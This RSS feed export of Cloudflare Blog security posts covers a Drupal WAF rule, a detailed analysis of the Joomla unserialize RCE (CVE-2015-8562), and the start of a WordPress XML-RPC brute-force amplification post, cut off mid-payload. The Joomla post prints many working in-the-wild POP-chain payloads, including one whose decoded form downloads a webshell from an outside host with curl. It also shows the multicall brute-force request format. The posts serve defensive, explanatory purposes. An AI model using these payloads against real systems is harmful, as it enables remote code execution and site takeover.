
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 14:50:15 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare is adding Drupal WAF Rule to Mitigate Critical Drupal Exploit]]></title>
            <link>https://blog.cloudflare.com/drupal-waf-rule-mitigate-critical-exploit/</link>
            <pubDate>Thu, 29 Mar 2018 04:10:38 GMT</pubDate>
            <description><![CDATA[ Drupal has recently announced an update to fix a critical remote code execution exploit (SA-CORE-2018-002/CVE-2018-7600). This patch is to disallow forms and form fields from starting with the “#” character. ]]></description>
            <content:encoded><![CDATA[ <p>Drupal has recently announced an update to fix a critical remote code execution exploit (<a href="https://www.drupal.org/sa-core-2018-002">SA-CORE-2018-002/CVE-2018-7600</a>). In response we have just pushed out a rule to block requests matching these exploit conditions for our <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">Web Application Firewall (WAF)</a>. You can find this rule in the Cloudflare ruleset in your dashboard under the Drupal category with the rule ID of D0003.</p><p>Drupal Advisory: <a href="https://www.drupal.org/sa-core-2018-002">https://www.drupal.org/sa-core-2018-002</a></p> ]]></content:encoded>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Drupal]]></category>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF]]></category>
            <guid isPermaLink="false">6Ni9TZK3zxYzUVGgOSzJZG</guid>
            <dc:creator>Pasha Kravtsov</dc:creator>
        </item>
        <item>
            <title><![CDATA[A Different Kind of POP: The Joomla Unserialize Vulnerability]]></title>
            <link>https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/</link>
            <pubDate>Thu, 17 Dec 2015 18:05:00 GMT</pubDate>
            <description><![CDATA[ At CloudFlare, we spend a lot of time talking about the PoPs (Points of Presence) we have around the globe; however, on December 14th, another kind of POP came to the world: a vulnerability being exploited in the wild against Joomla’s Content Management System. ]]></description>
            <content:encoded><![CDATA[ <p>At CloudFlare, we spend a lot of time talking about the PoPs (Points of Presence) we have around the globe; however, on December 14th, another kind of POP came to the world: a vulnerability being exploited in the wild against Joomla’s Content Management System. This is known as a zero day attack, where it has been zero days since a patch has been released for that bug. A CVE ID has been issued for this particular vulnerability as <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562">CVE-2015-8562</a>. Jaime Cochran and I decided to take a closer look.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1JFk6wEd8uVYQDXsCuufJL/9d1fe3c4f8e8622cc4ce44d58f67df6d/joomla-unserialize-vulnerability.png" />
            
            </figure><p>In this blog post we’ll explain what the vulnerability is, give examples of actual attack payloads we’ve seen, and show how CloudFlare automatically protects Joomla users. If you are using Joomla with CloudFlare today and have our WAF enabled, you are already protected.</p><p>The Joomla Web Application Firewall rule set is enabled by default for CloudFlare customers with a Pro or higher plan, which blocks this attack. You can find it in the Joomla section of the CloudFlare Rule Set in the WAF Dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hZkDzu55IzpvOOEgmEOQW/34407e9bae59e2a5b549917ba88feebe/waf-rule-for-joomla-unserialize-vuln.png" />
            
            </figure>
    <div>
      <h3>What is Joomla?</h3>
    </div>
    <p><a href="https://www.joomla.org/">Joomla</a> is an open source Content Management System which allows you to build web applications and control every aspect of the content of your website. Some of these resources include photos, videos, text, and documents to name just a few. As one can imagine, this is a high value target if an attacker can gain access to the admin control panel.</p>
    <div>
      <h3>The Unserialize Vulnerability</h3>
    </div>
    <p>The vulnerability is a bug class that is inherent in most languages including Java, Python’s pickle, C’s unmarshalling, Ruby (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0333">CVE-2013-0333</a>), and many others. This class of vulnerability is not new but has recently piqued the security world’s interest after an excellent <a href="http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">blog written by @breenmachine</a> was published. Like many vulnerabilities in CMS/framework software, the result is remote code execution, meaning a usually unauthenticated attacker can execute arbitrary code from afar, leading to the acquisition of sensitive information, a shell, and eventually a full system compromise.</p><p>So how is remote code execution achieved? There are two poorly sanitized inputs that can be controlled by a user: the <code>User-Agent</code> header and the <code>X-Forwarded-For</code> header. These are stored as part of the <code>session.client.browser</code> and <code>session.client.forwarded</code> objects, serialized, and inserted into Joomla’s MySQL database.</p><p>These request headers must contain malicious data known as a "POP chain" (Property Oriented Programming). POP chains, similar to their older cousin ROP (Return Oriented Programming), are constructed from a series of “magic PHP methods” that already exist in the code, which is why these kinds of attacks are often referred to as code reuse. An attacker must link these methods together in order to achieve their desired code execution.</p><p>The POP chain is then sent by the attacker in either the <code>User-Agent</code> or <code>X-Forwarded-For</code> header, and the attacker saves the session cookie that is returned upon completion of the request. From what we have noticed, most of these POP chains run <code>eval()</code> on the POST data, but not all of them: a <code>chr()</code>-encoded string can also be passed into <code>eval()</code> to execute any of the dangerous PHP calls: <code>system()</code>, <code>popen()</code>, <code>exec()</code>, <code>passthru()</code>, <code>shell_exec()</code>, etc. Here is an example of part of the exploit payload:</p>
            <pre><code>eval(base64_decode($_POST[111]))</code></pre>
            <p>Now, you may be wondering how this is exploited if the initial request isn’t a POST request. That is the next part of the exploit: after grabbing the session cookie value, the attacker sends a subsequent request with that session cookie set. The previous request’s <code>User-Agent</code> or <code>X-Forwarded-For</code> header was inserted into the MySQL database and is unserialized on the subsequent request. The trick is appending four UTF-8 characters to the end of the payload (such as <code>\xf0\xfd\xfd\xfd</code>), which truncates the payload and allows the code to execute. Crafting a successful payload also involves calculating the size of the payload and inserting it before the <code>eval()</code>, like so:</p>
            <pre><code>s:221:"eval(base64_decode($_POST[111]))</code></pre>
            <p>or the exploit will fail. We have been able to successfully exploit both vulnerable headers, using multiple variations of POP chains, in our test environment.</p><p>More importantly, we’ve been able to block them too.</p>
    <div>
      <h3>The Vulnerable Code</h3>
    </div>
    <p>In this section, we’ll go through the code path taken to exploit this vulnerability starting with <a href="https://github.com/joomla/joomla-cms/blob/3.5-dev/libraries/joomla/session/session.php">session.php</a>, where sessions are created. If you look at lines 909 and 932, you will see that the unsanitized <code>User-Agent</code> and <code>X-Forwarded-For</code> headers are set to <code>session.client.browser</code> and <code>session.client.forwarded</code>.</p>
            <pre><code>909: if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
910: {
911:     $this-&gt;set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
912: }

&lt;--&gt;

932: if (in_array('fix_browser', $this-&gt;_security) &amp;&amp; isset($_SERVER['HTTP_USER_AGENT']))
933: {
934:     $browser = $this-&gt;get('session.client.browser');
935:     if ($browser === null)
936:     {
937:         $this-&gt;set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
938:     }</code></pre>
            <p>PHP has a unique way of handling sessions: session objects are serialized when the session is written and unserialized when it is read. Joomla registers its own <a href="http://php.net/manual/en/function.session-set-save-handler.php">PHP session save handler</a>, and the serialized session data is saved to the database here:</p>
            <pre><code>public function write($id, $data)
{
	try
	{
		$query = $this-&gt;db-&gt;getQuery(true);
		$query-&gt;update($this-&gt;db-&gt;quoteName('#__session'))
			-&gt;set($this-&gt;db-&gt;quoteName('data') . ' = ' . $this-&gt;db-&gt;quote($data))
			-&gt;set($this-&gt;db-&gt;quoteName('time') . ' = ' . $this-&gt;db-&gt;quote((int) time()))
			-&gt;where($this-&gt;db-&gt;quoteName('session_id') . ' = ' . $this-&gt;db-&gt;quote($id));

		// Try to update the session data in the database table.
		$this-&gt;db-&gt;setQuery($query);

		if (!$this-&gt;db-&gt;execute())
		{
			return false;
		}

		// Since $this-&gt;db-&gt;execute did not throw an exception the query was successful.
		// Either the data changed, or the data was identical. In either case we are done.
		return true;
	}
	catch (\Exception $e)
	{
		return false;
	}
}</code></pre>
            <p>and then popped from the database here:</p>
            <pre><code>public function read($id)
{
	// Get the database connection object and verify it's connected.
	$db = JFactory::getDbo();

	try
	{
		// Get the session data from the database table.
		$query = $db-&gt;getQuery(true)
			-&gt;select($db-&gt;quoteName('data'))
			-&gt;from($db-&gt;quoteName('#__session'))
			-&gt;where($db-&gt;quoteName('session_id') . ' = ' . $db-&gt;quote($id));
		$db-&gt;setQuery($query);

		$result = (string) $db-&gt;loadResult();
		$result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);

		return $result;
	}
	catch (Exception $e)
	{
		return false;
	}
}</code></pre>
            <p>As per the PHP documentation: "The value returned will be unserialized automatically by PHP and used to populate the <code>$_SESSION</code> superglobal." So the session data is pulled from the database by <code>session_id</code> and unserialized, and if the POP chain was constructed correctly, it will execute the malicious code.</p>
    <div>
      <h3>What we see with our Web Application Firewall</h3>
    </div>
    <p>After writing a ruleset specifically to block this attack and making it block by default for all our customers, we saw a very large number of requests that triggered the ruleset. This shows malicious actors trying to directly exploit Joomla installs:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/vnyQCbeUmTjjCER4Kj4V0/118d18d8729cca6ab8216b9bb85bb603/waf-activity-of-joomla-unserialize-vuln.png" />
            
            </figure><p>As you can see, the number of blocked requests spiked sharply when public exploits were released. Here is a small sample of the different payloads we’ve been seeing since public exploits were released a day ago:</p>
            <pre><code>[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ellyel8'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:954:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

[ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:954:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

[ Payload ]:   sjeua}__eusmxa|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:61:"eval(base64_decode($_POST[1111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

[ Payload ]:   sjeua}__eusmxa|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:61:"eval(base64_decode($_POST[1111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

[ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:59:"eval(base64_decode($_POST[200]));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?</code></pre>
            <p>As you can see, there are a few different payloads in use. Specifically, the payloads using <code>chr()</code> inside <code>eval()</code> are from the <a href="http://pastebin.com/PRiK0SWL">public exploit released on PasteBin</a> yesterday, December 15th, along with a Metasploit module. Some payloads translate to:</p>
            <pre><code>system('cd components;cd com_media;rm -rf k.txt;curl -O http://tiptopcom.tv/blog/k.txt;mv k.txt ajax.php');</code></pre>
            <p>This is a simple example where an attacker tries to find a writable directory, retrieves a malicious file from a remote host (most likely a compromised computer), and disguises it as a seemingly innocuous PHP file. The file is known as a webshell and gives the attacker a way to easily execute code and a small amount of persistence. But this is only a very basic example of what an attacker might do.</p><p>We have found some payloads that classically extract credentials from the Joomla configuration file or attempt to spawn a connectback shell, a technique that makes the target computer open an outbound connection to an attacker-controlled computer, allowing the attacker to operate as if they had terminal access to the target. This is often used when a target does not have an attacker-friendly environment (such as properly jailed user accounts and read-only directories). The original zero day was using a webshell-dropping payload that cleverly patched the <code>User-Agent</code> bug behind itself.</p><p>Since the first public exploit was released, our WAF has blocked 16,413 attacks and counting.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Joomla]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">1UuPRoiC85hckUH7JESUWq</guid>
            <dc:creator>Pasha Kravtsov</dc:creator>
        </item>
        <item>
            <title><![CDATA[A Look at the New WordPress Brute Force Amplification Attack]]></title>
            <link>https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/</link>
            <pubDate>Fri, 16 Oct 2015 17:14:32 GMT</pubDate>
            <description><![CDATA[ Recently, a new brute force attack method for WordPress instances was identified by Sucuri. This latest technique allows attackers to try a large number of WordPress username and password login combinations in a single HTTP request. ]]></description>
            <content:encoded><![CDATA[ <p>Recently, a new brute force attack method for WordPress instances was identified by Sucuri. This latest technique allows attackers to try a large number of WordPress username and password login combinations in a single HTTP request.</p><p>The vulnerability can easily be abused by a simple script to try a significant number of username and password combinations with a relatively small number of HTTP requests. The following diagram shows a 4-to-1 ratio of login attempts to HTTP requests, but this can trivially be expanded to a thousand logins per request.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jdeVX3b5JHTMwZvY4J7wY/3db3519b348381101ef3bdd943e6e636/wordpress-xmlrpc-brute-force-amplification.png" />
            
            </figure><p>This form of brute force attack is harder to detect, since you won’t necessarily see a flood of requests. Fortunately, all CloudFlare paid customers have the option to enable a Web Application Firewall ruleset to stop this new attack method.</p>
    <div>
      <h3>What is XML-RPC?</h3>
    </div>
    <p>To understand the vulnerability, it’s important to understand the basics of the XML remote procedure call protocol (XML-RPC).</p><p>XML-RPC uses XML encoding over HTTP to provide a remote procedure call protocol. It’s commonly used to execute various <a href="https://codex.wordpress.org/XML-RPC_WordPress_API">functions in a WordPress instance</a> for APIs and other automated tasks. Requests that modify, manipulate, or view data using XML-RPC require user credentials with sufficient permissions.</p><p>Here is an example that requests a list of the user’s blogs:</p>
            <pre><code>&lt;?xml version="1.0" encoding="iso-8859-1"?&gt;
&lt;methodCall&gt;
&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;
&lt;params&gt;
 &lt;param&gt;
  &lt;value&gt;
   &lt;string&gt;admin&lt;/string&gt;
  &lt;/value&gt;
 &lt;/param&gt;
 &lt;param&gt;
  &lt;value&gt;
   &lt;string&gt;password123&lt;/string&gt;
  &lt;/value&gt;
 &lt;/param&gt;
&lt;/params&gt;
&lt;/methodCall&gt;</code></pre>
            <p>The server responds with an XML message containing the requested information. The <code>isAdmin</code> name-value pair tells us our credentials were correct:</p>
            <pre><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;methodResponse&gt;
&lt;params&gt;
	&lt;param&gt;
	  &lt;value&gt;
	  &lt;array&gt;&lt;data&gt;
	  &lt;value&gt;&lt;struct&gt;
	  &lt;member&gt;
		&lt;name&gt;isAdmin&lt;/name&gt;
		&lt;value&gt;&lt;boolean&gt;1&lt;/boolean&gt;&lt;/value&gt;
	  &lt;/member&gt;
	  &lt;member&gt;
		&lt;name&gt;url&lt;/name&gt;
		&lt;value&gt;&lt;string&gt;http://example.com/&lt;/string&gt;&lt;/value&gt;
	  &lt;/member&gt;
	  &lt;member&gt;
		&lt;name&gt;blogid&lt;/name&gt;
		&lt;value&gt;&lt;string&gt;1&lt;/string&gt;&lt;/value&gt;
	  &lt;/member&gt;
	  &lt;member&gt;
		&lt;name&gt;blogName&lt;/name&gt;
		&lt;value&gt;&lt;string&gt;testing&lt;/string&gt;&lt;/value&gt;
	  &lt;/member&gt;
	  &lt;member&gt;
		&lt;name&gt;xmlrpc&lt;/name&gt;
		&lt;value&gt;&lt;string&gt;http://example.com/xmlrpc.php&lt;/string&gt;&lt;/value&gt;
	  &lt;/member&gt;
	  &lt;/struct&gt;&lt;/value&gt;
	  &lt;/data&gt;&lt;/array&gt;
	  &lt;/value&gt;
	&lt;/param&gt;
&lt;/params&gt;
&lt;/methodResponse&gt;</code></pre>
            <p>As shown in this request, you must provide proper authentication to get a successful response. You can, in theory, create a script that tries different combinations of the username and password, but that is a noisy option that isn’t very effective and is easily detected (the server logs would show a flood of failed login attempts).</p><p>This is where the <code>system.multicall</code> functionality comes into play. You can run multiple methods with a single HTTP request. This is useful for mass editing blogs or deleting large numbers of comments, etc. Any method that requires authentication can be abused to brute force credentials. Here is what a sample XML <code>system.multicall</code> payload would look like:</p>
            <pre><code>&lt;?xml version="1.0"?&gt;
&lt;methodCall&gt;
&lt;methodName&gt;system.multicall&lt;/methodName&gt;
&lt;params&gt;
  &lt;param&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;
  &lt;value&gt;&lt;struct&gt;
  &lt;member&gt;
	&lt;name&gt;methodName&lt;/name&gt;
	&lt;value&gt;&lt;string&gt;wp.getUsersBlogs&lt;/string&gt;&lt;/value&gt;
  &lt;/member&gt;
  &lt;member&gt;
	&lt;name&gt;params&lt;/name&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;
	&lt;value&gt;&lt;array&gt;&lt;data&gt;
	&lt;value&gt;&lt;string&gt;admin&lt;/string&gt;&lt;/value&gt;
